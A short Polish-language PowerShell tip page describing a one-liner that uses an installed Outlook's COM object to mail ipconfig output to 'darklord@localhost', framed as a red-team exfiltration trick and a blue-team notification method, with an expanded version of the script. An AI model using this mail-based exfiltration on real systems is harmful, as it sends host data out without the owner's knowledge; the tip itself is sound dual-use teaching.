PowerShell protip 006f
in 𝕏

ipconfig Outlookiem

tty1 · powershell
PS> $m=(New-Object -c Outlook.Application).CreateItem(0);$m.To="darklord@localhost";$m.Subject="ip";$m.Body=(ipconfig|out-string);$m.Send()
#Powershell#RedTeam#Exfil#Admin

Przykład onelinera, który wysyła wynik polecenia ipconfig mailem z wykorzystaniem zainstalowanego i skonfigurowanego Microsoft Outlooka. Dla red teamów jest to ciekawy sposób na eksfiltrację danych, z kolei blue teamy mogą to wykorzystać w swoich skryptach jako mechanizm powiadamiania o różnych wydarzeniach.

Szczegóły

Głównymi bohaterami sa tutaj oczywiście sam Microsoft Outlook oraz cmdlet New-Object, za którego pomocą tworzymy nowy obiekt COM. Żeby całość była bardziej czytelna, moglibyśmy to zapisać tak:

$Outlook = New-Object -ComObject Outlook.Application
$Mail = $Outlook.CreateItem(0)
$Mail.To = "darklord@localhost"
$Mail.Subject = "ip"
$Mail.Body = ipconfig|Out-String
$Mail.Send()

Przydatne linki

https://learn.microsoft.com/en-us/office/vba/api/outlook.mailitem dokumentacja obiektu MailItem web ↗
← poprzedni protip 006e ••• Wszystkie protipy następny → protip 0070
// subskrybuj

Nowe protipy prosto na maila.

Mięsiste jednolinijkowce i triki z prawdziwych zleceń. Zero spamu, zero teorii. Wypisujesz się jednym kliknięciem.

wersja newslettera: